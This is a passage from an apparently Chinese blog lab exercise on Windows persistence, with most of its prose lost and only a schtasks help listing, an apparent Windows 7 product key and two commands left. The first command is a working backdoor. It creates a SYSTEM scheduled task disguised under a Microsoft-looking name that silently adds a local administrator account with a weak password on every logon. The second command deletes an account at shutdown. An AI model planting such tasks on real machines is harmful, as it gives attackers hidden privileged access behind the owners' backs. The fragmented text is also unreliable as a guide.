网络攻防任务二：开机、关机事件触发账户的创建与删除

 

一、

:

1、

2、

 

 

二、

schtasks

schtasksnet user

at.bat

 

xpwin7

Win7YKHFT KW986 GK4PY FDWYH 7TP9F

 

（二）

Schtasks:

 

    

    

 

:

    /Create         

 

    /Delete         

 

    /Query          

 

    /Change         

 

    /Run            

 

    /End            

 

    /ShowSid        

 

    /?              

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

ID为4624

schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"

 

 

 

 

 

 

 

 

 

 

 

 

 

（三）

ID为1074

schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

 

 

 

 

 

 

 

 

 

net user

 

 

来源：博客园

作者：笛在月明楼

链接：https://www.cnblogs.com/cyx-b/p/11487845.html